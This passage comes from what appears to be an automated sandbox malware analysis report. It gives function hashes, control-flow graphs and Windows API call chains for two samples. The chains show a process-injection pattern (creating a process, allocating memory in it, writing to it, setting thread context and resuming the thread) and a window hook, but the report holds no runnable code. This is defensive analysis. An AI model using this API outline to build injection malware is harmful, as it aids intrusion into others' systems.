                                Memory Dump Source
                                • Source File: 00000000.00000002.2083719205.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7860000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a20ea56a08f7879fd2773e47baff2cbfb0b404760b35d0da6310377e91b143ca
                                • Instruction ID: 4e7699225c81530dd3a2bae7d890b1bc363a0121da821bb428778a1ae736b3c9
                                • Opcode Fuzzy Hash: a20ea56a08f7879fd2773e47baff2cbfb0b404760b35d0da6310377e91b143ca
                                • Instruction Fuzzy Hash: A15180B5D006199FDB08CFEAD9846EEFBB2FF89300F10802AE519AB254DB345946CF50
                                Function 0786AF93 Relevance: .1, Instructions: 133COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2083719205.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7860000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 93057280861e607fe966284569bf052392eeeee8df593207d4e63cb24cebb7c2
                                • Instruction ID: 57f1d3ae4afcd4e403d7aceb68a0f371a8bb2aa3f875c3a97332cdeade09ea8d
                                • Opcode Fuzzy Hash: 93057280861e607fe966284569bf052392eeeee8df593207d4e63cb24cebb7c2
                                • Instruction Fuzzy Hash: 46510AB4E002199FDB14DFAAC5845AEFBF2FF89305F24C169D418AB256D7309941CFA1
                                Function 07863F77 Relevance: .1, Instructions: 128COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2083719205.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7860000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f6f4f864cd8a228fe9c64161fd44bd781fd94966155fd2eecb518ca9d2300935
                                • Instruction ID: 15cd71ae92d5f9fe991efd3d5dd49f444d99e90ecd224643357e483011bf4ed9
                                • Opcode Fuzzy Hash: f6f4f864cd8a228fe9c64161fd44bd781fd94966155fd2eecb518ca9d2300935
                                • Instruction Fuzzy Hash: 85515FB5E006599FDB48DFAAC98469EFBF2BF88300F14C16AD419AB314DB349946CF50
                                Function 07863CEA Relevance: .1, Instructions: 98COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2083719205.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7860000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 97b992fdd48525ba49da0b8f318274ffa22b5b0580e85155512aa1d313c70190
                                • Instruction ID: c2ad0b525703d0f4f18e6c091b28ac4ea4ebd97601af2afa1d76002bf4e9ba3a
                                • Opcode Fuzzy Hash: 97b992fdd48525ba49da0b8f318274ffa22b5b0580e85155512aa1d313c70190
                                • Instruction Fuzzy Hash: 504180B5E006199FDB08CFEAC9856EEFBF2AF88300F14C02AD519AB254DB345946CF40

                                Execution Graph

                                Execution Coverage:7.3%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:22
                                Total number of Limit Nodes:3
                                execution_graph 16098 318b6c8 16099 318b70e 16098->16099 16104 318b908 16099->16104 16112 318b8a8 16099->16112 16115 318b898 16099->16115 16100 318b7fb 16105 318b90f DuplicateHandle 16104->16105 16106 318b8a4 16104->16106 16109 318b9a6 16105->16109 16108 318b871 16106->16108 16120 318b3c8 16106->16120 16108->16100 16109->16100 16113 318b3c8 DuplicateHandle 16112->16113 16114 318b8d6 16113->16114 16114->16100 16116 318b871 16115->16116 16117 318b8a2 16115->16117 16116->16100 16117->16116 16118 318b3c8 DuplicateHandle 16117->16118 16119 318b8d6 16118->16119 16119->16100 16121 318b910 DuplicateHandle 16120->16121 16122 318b8d6 16121->16122 16122->16100 16094 31864b0 16096 31864f4 SetWindowsHookExW 16094->16096 16097 318653a 16096->16097

                                Executed Functions

                                Function 0318B908 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1388 318b908-318b90d 1389 318b90f-318b9a4 DuplicateHandle 1388->1389 1390 318b8a4 1388->1390 1394 318b9ad-318b9ca 1389->1394 1395 318b9a6-318b9ac 1389->1395 1392 318b871-318b895 1390->1392 1393 318b8a6-318b8d1 call 318b3c8 1390->1393 1402 318b8d6-318b8fc 1393->1402 1395->1394
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0318B8D6,?,?,?,?,?), ref: 0318B997
                                Memory Dump Source
                                • Source File: 00000009.00000002.4527534099.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_3180000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 82ca3f66c91f8141b0e6def682faa12e73f533d5c05722314d51bfdc3f8d6b37
                                • Instruction ID: 057dc7771d8ad34c4cd1477172cb0bd566300f9ebc39192aefa632e3107549d5
                                • Opcode Fuzzy Hash: 82ca3f66c91f8141b0e6def682faa12e73f533d5c05722314d51bfdc3f8d6b37
                                • Instruction Fuzzy Hash: F3414676900208AFCB10DF9AD844AEEBFF9FF49310F14841AEA04A7320D735A954CFA4
                                Function 0318B3C8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1405 318b3c8-318b9a4 DuplicateHandle 1407 318b9ad-318b9ca 1405->1407 1408 318b9a6-318b9ac 1405->1408 1408->1407
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0318B8D6,?,?,?,?,?), ref: 0318B997
                                Memory Dump Source
                                • Source File: 00000009.00000002.4527534099.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_3180000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 0d7e21b582ad96b24581093e6b3523e731134c2db3842bc05c233ba6f5bdc45d
                                • Instruction ID: 2d526f4831432eea2708be3b1a55420e8187248bf2b854f3c93b6a5894dc70ee
                                • Opcode Fuzzy Hash: 0d7e21b582ad96b24581093e6b3523e731134c2db3842bc05c233ba6f5bdc45d
                                • Instruction Fuzzy Hash: 392103B5D002089FDB10DF9AD584AEEFBF8FB48310F14841AE918A3310D379A940CFA4
                                Function 031864A8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1411 31864a8-31864fa 1414 31864fc 1411->1414 1415 3186506-3186538 SetWindowsHookExW 1411->1415 1418 3186504 1414->1418 1416 318653a-3186540 1415->1416 1417 3186541-3186566 1415->1417 1416->1417 1418->1415
                                APIs
                                • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 0318652B
                                Memory Dump Source
                                • Source File: 00000009.00000002.4527534099.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_3180000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: HookWindows
                                • String ID:
                                • API String ID: 2559412058-0
                                • Opcode ID: 1e1d03d4c1e942eca5f892db16b6d227ba9f37baaf986a6eaac2603d42031248
                                • Instruction ID: 666487d8f444fbc78fc526fb02859fc1cc2d4d17d2efa2ac66644ce62d936bcb
                                • Opcode Fuzzy Hash: 1e1d03d4c1e942eca5f892db16b6d227ba9f37baaf986a6eaac2603d42031248
                                • Instruction Fuzzy Hash: FD2134B59002099FCB24DFAAD944BEEFBF5FF88310F10841AE519A7250CB74A945CFA5
                                Function 031864B0 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                Download Yara Rule
                                APIs
                                • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 0318652B
                                Memory Dump Source
                                • Source File: 00000009.00000002.4527534099.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_3180000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: HookWindows
                                • String ID:
                                • API String ID: 2559412058-0
                                • Opcode ID: 1d428021a724805b33e1cd63559f4b20662589b1add87080d35d81ce6f634fd0
                                • Instruction ID: c1e7142b3ded089565e20cae9454bd06165756c3b75bd6c1936393f1a4f9d55b
                                • Opcode Fuzzy Hash: 1d428021a724805b33e1cd63559f4b20662589b1add87080d35d81ce6f634fd0
                                • Instruction Fuzzy Hash: 942115B59002098FCB14DF9AD944BEEFBF5FF88310F148419E519A7250CB74A940CFA5
                                Function 016ED514 Relevance: .1, Instructions: 75COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000009.00000002.4526447974.00000000016ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 016ED000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_16ed000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2a69296542eb39adbe2c8de5c0571af7ef8eb1c469bc71cfbeda0c80dcfceb4f
                                • Instruction ID: c7f233e056f42c9191990267900ac9ce6c870e92ed5ac732155f7b384d710b4a
                                • Opcode Fuzzy Hash: 2a69296542eb39adbe2c8de5c0571af7ef8eb1c469bc71cfbeda0c80dcfceb4f
                                • Instruction Fuzzy Hash: 262103B1504240DFDB05DF58DDC8F2ABFA5FB88318F248669E9090B356C33AD416CAA2
                                Function 0190D0FC Relevance: .1, Instructions: 72COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000009.00000002.4526939906.000000000190D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0190D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_190d000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 74b174bea60abe41b57de91b767ce29ff142207fb1139bc215e246eb83853cf7
                                • Instruction ID: 1e488edd6aaafcf08cb78ab8757cf2000797d577291d7af2cf6674edf5556703
                                • Opcode Fuzzy Hash: 74b174bea60abe41b57de91b767ce29ff142207fb1139bc215e246eb83853cf7
                                • Instruction Fuzzy Hash: 4A21F2755042049FDB4ADFA8D9C0F26BBA9FB88314F20C96DD90D4B296CB3AD446CA61
                                Function 0190D01C Relevance: .1, Instructions: 71COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000009.00000002.4526939906.000000000190D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0190D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_190d000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 56b5b988c53d80dbc250e83b5bb7788881386d95d2ff80c8f4cedea8f80f5a32
                                • Instruction ID: b218698eb903d2ba25c1ffa91c5e6326b4d004d36f9cf48958f2cd51e328bfe5
                                • Opcode Fuzzy Hash: 56b5b988c53d80dbc250e83b5bb7788881386d95d2ff80c8f4cedea8f80f5a32
                                • Instruction Fuzzy Hash: 3921F271604200DFDB16DFA8C580F26BFB9EB84354F20C56DD90D4B392C33AD846C661
                                Function 016ED50F Relevance: .1, Instructions: 56COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000009.00000002.4526447974.00000000016ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 016ED000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_16ed000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                • Instruction ID: 3a72a4fa57041afaa7fda42abd4898a6461a84f25395738bd5f51df2f629f8fe
                                • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                • Instruction Fuzzy Hash: 0A11DF72404280CFCB02CF44D9C8B16BFB2FB84314F24C6A9D9094B656C336D45ACBA2
                                Function 0190D0F7 Relevance: .1, Instructions: 53COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000009.00000002.4526939906.000000000190D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0190D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_190d000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                • Instruction ID: b5a54fa1b37a6c9d42002f1a94f816698ce6c726925494d2af903ebb08fdecd8
                                • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                • Instruction Fuzzy Hash: 7811BB75504284CFDB0ACF98D9C4B15BFA2FB84224F24C6A9D8494B296C33AD44ACB62
                                Function 0190D017 Relevance: .1, Instructions: 52COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000009.00000002.4526939906.000000000190D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0190D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_190d000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 212b96ca827b798fa91ccd41c0eac3b093082415815754ec50078a914fdf967d
                                • Instruction ID: 134643515158137284677e2743cdc85508f13a2568af57aaa93aced2e0829af5
                                • Opcode Fuzzy Hash: 212b96ca827b798fa91ccd41c0eac3b093082415815754ec50078a914fdf967d
                                • Instruction Fuzzy Hash: 5E118B75504280CFDB16CF54D5C4B15BFB1FB84218F24C6A9D94D4B696C33AD44ACB92

                                Execution Graph

                                Execution Coverage:9.5%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:152
                                Total number of Limit Nodes:13
                                execution_graph 28848 124d5e0 28849 124d626 GetCurrentProcess 28848->28849 28851 124d671 28849->28851 28852 124d678 GetCurrentThread 28849->28852 28851->28852 28853 124d6b5 GetCurrentProcess 28852->28853 28854 124d6ae 28852->28854 28855 124d6eb 28853->28855 28854->28853 28856 124d713 GetCurrentThreadId 28855->28856 28857 124d744 28856->28857 28893 124b250 28896 124b33b 28893->28896 28894 124b25f 28897 124b37c 28896->28897 28898 124b359 28896->28898 28897->28894 28898->28897 28899 124b580 GetModuleHandleW 28898->28899 28900 124b5ad 28899->28900 28900->28894 28901 777db00 28903 777db22 28901->28903 28902 777dd30 28903->28902 28905 777f91a 28903->28905 28906 777f942 28905->28906 28907 777f922 28905->28907 28924 e960833 28906->28924 28929 e9607a9 28906->28929 28934 e96016d 28906->28934 28940 e9603ed 28906->28940 28945 e96066f 28906->28945 28950 e960521 28906->28950 28955 e960107 28906->28955 28960 e960567 28906->28960 28967 e960858 28906->28967 28971 e96049d 28906->28971 28976 e960891 28906->28976 28980 e9606d1 28906->28980 28985 e960911 28906->28985 28989 e9602f3 28906->28989 28994 e960753 28906->28994 28907->28903 28908 777f98e 28908->28903 28925 e9607f0 28924->28925 28926 e96078f 28924->28926 28999 777d4e9 28925->28999 29003 777d4f0 28925->29003 28926->28908 28930 e9607ad 28929->28930 28931 e960947 28930->28931 28932 777d4f0 WriteProcessMemory 28930->28932 28933 777d4e9 WriteProcessMemory 28930->28933 28932->28931 28933->28931 28935 e9600f3 28934->28935 28936 e960170 28934->28936 28935->28908 28936->28908 28936->28935 29007 777d76c 28936->29007 29011 777d778 28936->29011 28941 e9604dd 28940->28941 29015 777d5df 28941->29015 29019 777d5e0 28941->29019 28942 e960257 28942->28908 28946 e96067f 28945->28946 28947 e960947 28946->28947 28948 777d4f0 WriteProcessMemory 28946->28948 28949 777d4e9 WriteProcessMemory 28946->28949 28948->28947 28949->28947 28951 e96063e 28950->28951 29023 777d430 28951->29023 29027 777d428 28951->29027 28952 e96065c 28956 e960111 28955->28956 28958 777d76c CreateProcessA 28956->28958 28959 777d778 CreateProcessA 28956->28959 28957 e96022c 28957->28908 28958->28957 28959->28957 29031 777cf20 28960->29031 29035 777cf18 28960->29035 28961 e960313 28962 e9609ab 28961->28962 29039 777ce70 28961->29039 29043 777ce68 28961->29043 28962->28908 28969 777cf20 Wow64SetThreadContext 28967->28969 28970 777cf18 Wow64SetThreadContext 28967->28970 28968 e960872 28969->28968 28970->28968 28972 e9604aa 28971->28972 28974 777d4f0 WriteProcessMemory 28972->28974 28975 777d4e9 WriteProcessMemory 28972->28975 28973 e960811 28973->28908 28974->28973 28975->28973 28978 777d4f0 WriteProcessMemory 28976->28978 28979 777d4e9 WriteProcessMemory 28976->28979 28977 e9608b8 28978->28977 28979->28977 28981 e9606d7 28980->28981 28983 777ce70 ResumeThread 28981->28983 28984 777ce68 ResumeThread 28981->28984 28982 e9609ab 28982->28908 28983->28982 28984->28982 28987 777d4f0 WriteProcessMemory 28985->28987 28988 777d4e9 WriteProcessMemory 28985->28988 28986 e960947 28987->28986 28988->28986 28990 e960313 28989->28990 28992 777ce70 ResumeThread 28990->28992 28993 777ce68 ResumeThread 28990->28993 28991 e9609ab 28991->28908 28992->28991 28993->28991 28995 e960759 28994->28995 28997 777ce70 ResumeThread 28995->28997 28998 777ce68 ResumeThread 28995->28998 28996 e9609ab 28996->28908 28997->28996 28998->28996 29000 777d4f0 WriteProcessMemory 28999->29000 29002 777d58f 29000->29002 29002->28926 29004 777d538 WriteProcessMemory 29003->29004 29006 777d58f 29004->29006 29006->28926 29008 777d778 CreateProcessA 29007->29008 29010 777d9c3 29008->29010 29010->29010 29012 777d801 CreateProcessA 29011->29012 29014 777d9c3 29012->29014 29014->29014 29016 777d5e0 ReadProcessMemory 29015->29016 29018 777d66f 29016->29018 29018->28942 29020 777d62b ReadProcessMemory 29019->29020 29022 777d66f 29020->29022 29022->28942 29024 777d470 VirtualAllocEx 29023->29024 29026 777d4ad 29024->29026 29026->28952 29028 777d430 VirtualAllocEx 29027->29028 29030 777d4ad 29028->29030 29030->28952 29032 777cf65 Wow64SetThreadContext 29031->29032 29034 777cfad 29032->29034 29034->28961 29036 777cf20 Wow64SetThreadContext 29035->29036 29038 777cfad 29036->29038 29038->28961 29040 777ceb0 ResumeThread 29039->29040 29042 777cee1 29040->29042 29042->28962 29044 777ce70 ResumeThread 29043->29044 29046 777cee1 29044->29046 29046->28962 29047 777de00 29048 777db94 29047->29048 29049 777dd30 29048->29049 29050 777f91a 12 API calls 29048->29050 29050->29048 28858 124d828 DuplicateHandle 28859 124d8be 28858->28859 28860 1244668 28861 124467a 28860->28861 28863 1244686 28861->28863 28864 1244778 28861->28864 28865 124479d 28864->28865 28869 1244878 28865->28869 28873 1244888 28865->28873 28870 12448af 28869->28870 28872 124498c 28870->28872 28877 1244560 28870->28877 28875 12448af 28873->28875 28874 124498c 28874->28874 28875->28874 28876 1244560 CreateActCtxA 28875->28876 28876->28874 28878 1245d18 CreateActCtxA 28877->28878 28880 1245ddb 28878->28880 28880->28880 28881 e960ef8 28882 e961083 28881->28882 28883 e960f1e 28881->28883 28883->28882 28886 e961170 28883->28886 28890 e961178 28883->28890 28887 e96117f PostMessageW 28886->28887 28888 e961178 28886->28888 28889 e9611e4 28887->28889 28888->28887 28889->28883 28891 e96117f PostMessageW 28890->28891 28892 e9611e4 28891->28892 28892->28883

                                Executed Functions

                                Function 0124D5D0 Relevance: 6.1, APIs: 4, Instructions: 135threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 295 124d5d0-124d66f GetCurrentProcess 299 124d671-124d677 295->299 300 124d678-124d6ac GetCurrentThread 295->300 299->300 301 124d6b5-124d6e9 GetCurrentProcess 300->301 302 124d6ae-124d6b4 300->302 304 124d6f2-124d70d call 124d7b1 301->304 305 124d6eb-124d6f1 301->305 302->301 308 124d713-124d742 GetCurrentThreadId 304->308 305->304 309 124d744-124d74a 308->309 310 124d74b-124d7ad 308->310 309->310
                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 0124D65E
                                • GetCurrentThread.KERNEL32 ref: 0124D69B
                                • GetCurrentProcess.KERNEL32 ref: 0124D6D8
                                • GetCurrentThreadId.KERNEL32 ref: 0124D731
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2138162260.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_1240000_RTUZKYTc.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: 459d56549ad0248f1ea722ce1fcc9406a1b99b3f71197d8d4ca605539ad87459
                                • Instruction ID: cd55fbdc48fd93f8ef5db53977b965aa41a1527be6e856cac2f84a2402e73153
                                • Opcode Fuzzy Hash: 459d56549ad0248f1ea722ce1fcc9406a1b99b3f71197d8d4ca605539ad87459
                                • Instruction Fuzzy Hash: 065155B09103498FDB18DFA9D948BAEBFF1EF89304F208459D549A7260DBB85884CF65
                                Function 0124D5E0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 317 124d5e0-124d66f GetCurrentProcess 321 124d671-124d677 317->321 322 124d678-124d6ac GetCurrentThread 317->322 321->322 323 124d6b5-124d6e9 GetCurrentProcess 322->323 324 124d6ae-124d6b4 322->324 326 124d6f2-124d70d call 124d7b1 323->326 327 124d6eb-124d6f1 323->327 324->323 330 124d713-124d742 GetCurrentThreadId 326->330 327->326 331 124d744-124d74a 330->331 332 124d74b-124d7ad 330->332 331->332
                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 0124D65E
                                • GetCurrentThread.KERNEL32 ref: 0124D69B
                                • GetCurrentProcess.KERNEL32 ref: 0124D6D8
                                • GetCurrentThreadId.KERNEL32 ref: 0124D731
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2138162260.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_1240000_RTUZKYTc.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: 8a6f16f5fd7064d33a9b0690c50ab73d06178f7182c39a3b04ff3750c66b753c
                                • Instruction ID: 56a1e0a4b1d393f645ec192536c0ff0fd13c4a45d591b06794f65ac301df1465
                                • Opcode Fuzzy Hash: 8a6f16f5fd7064d33a9b0690c50ab73d06178f7182c39a3b04ff3750c66b753c
                                • Instruction Fuzzy Hash: CF5145B0A102498FDB18DFA9D548BAEBFF1FF89304F208459E509A7360DBB85944CF65
                                Function 0777D76C Relevance: 1.8, APIs: 1, Instructions: 252processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 453 777d76c-777d80d 456 777d846-777d866 453->456 457 777d80f-777d819 453->457 462 777d89f-777d8ce 456->462 463 777d868-777d872 456->463 457->456 458 777d81b-777d81d 457->458 460 777d840-777d843 458->460 461 777d81f-777d829 458->461 460->456 464 777d82d-777d83c 461->464 465 777d82b 461->465 471 777d907-777d9c1 CreateProcessA 462->471 472 777d8d0-777d8da 462->472 463->462 467 777d874-777d876 463->467 464->464 466 777d83e 464->466 465->464 466->460 468 777d899-777d89c 467->468 469 777d878-777d882 467->469 468->462 473 777d886-777d895 469->473 474 777d884 469->474 485 777d9c3-777d9c9 471->485 486 777d9ca-777da50 471->486 472->471 475 777d8dc-777d8de 472->475 473->473 476 777d897 473->476 474->473 477 777d901-777d904 475->477 478 777d8e0-777d8ea 475->478 476->468 477->471 480 777d8ee-777d8fd 478->480 481 777d8ec 478->481 480->480 482 777d8ff 480->482 481->480 482->477 485->486 496 777da52-777da56 486->496 497 777da60-777da64 486->497 496->497 498 777da58 496->498 499 777da66-777da6a 497->499 500 777da74-777da78 497->500 498->497 499->500 501 777da6c 499->501 502 777da7a-777da7e 500->502 503 777da88-777da8c 500->503 501->500 502->503 504 777da80 502->504 505 777da9e-777daa5 503->505 506 777da8e-777da94 503->506 504->503 507 777daa7-777dab6 505->507 508 777dabc 505->508 506->505 507->508 510 777dabd 508->510 510->510
                                APIs
                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0777D9AE
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2163955662.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7770000_RTUZKYTc.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 6c0ece6dfabaebcaa640c4122bb901f16d85a8faf8702823396eb7a14cee6aca
                                • Instruction ID: ba4e8e5ab37deffa09af37c5bb1631b44715c46f827ab2b9e0e9958790e46995
                                • Opcode Fuzzy Hash: 6c0ece6dfabaebcaa640c4122bb901f16d85a8faf8702823396eb7a14cee6aca
                                • Instruction Fuzzy Hash: 68A16CB1E0021ACFDF24DF68C845BEDBBB2BF48354F148569D819A7240DB749985CF92
                                Function 0777D778 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 511 777d778-777d80d 513 777d846-777d866 511->513 514 777d80f-777d819 511->514 519 777d89f-777d8ce 513->519 520 777d868-777d872 513->520 514->513 515 777d81b-777d81d 514->515 517 777d840-777d843 515->517 518 777d81f-777d829 515->518 517->513 521 777d82d-777d83c 518->521 522 777d82b 518->522 528 777d907-777d9c1 CreateProcessA 519->528 529 777d8d0-777d8da 519->529 520->519 524 777d874-777d876 520->524 521->521 523 777d83e 521->523 522->521 523->517 525 777d899-777d89c 524->525 526 777d878-777d882 524->526 525->519 530 777d886-777d895 526->530 531 777d884 526->531 542 777d9c3-777d9c9 528->542 543 777d9ca-777da50 528->543 529->528 532 777d8dc-777d8de 529->532 530->530 533 777d897 530->533 531->530 534 777d901-777d904 532->534 535 777d8e0-777d8ea 532->535 533->525 534->528 537 777d8ee-777d8fd 535->537 538 777d8ec 535->538 537->537 539 777d8ff 537->539 538->537 539->534 542->543 553 777da52-777da56 543->553 554 777da60-777da64 543->554 553->554 555 777da58 553->555 556 777da66-777da6a 554->556 557 777da74-777da78 554->557 555->554 556->557 558 777da6c 556->558 559 777da7a-777da7e 557->559 560 777da88-777da8c 557->560 558->557 559->560 561 777da80 559->561 562 777da9e-777daa5 560->562 563 777da8e-777da94 560->563 561->560 564 777daa7-777dab6 562->564 565 777dabc 562->565 563->562 564->565 567 777dabd 565->567 567->567
                                APIs
                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0777D9AE
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2163955662.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7770000_RTUZKYTc.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: ba29faeff35f20933db105f82614b7a83338ffa9593403e5d5081b1cc0c6d0c3
                                • Instruction ID: 57a0316193c3fc867d38baf67f44a230622160d5e0a73d23a2f9d06634dc1d2f
                                • Opcode Fuzzy Hash: ba29faeff35f20933db105f82614b7a83338ffa9593403e5d5081b1cc0c6d0c3
                                • Instruction Fuzzy Hash: 28915BB1E0021ACFDF24DF68C845BEEBBB2BF48354F148569D819A7240DB749985CF92
                                Function 0124B33B Relevance: 1.7, APIs: 1, Instructions: 200COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
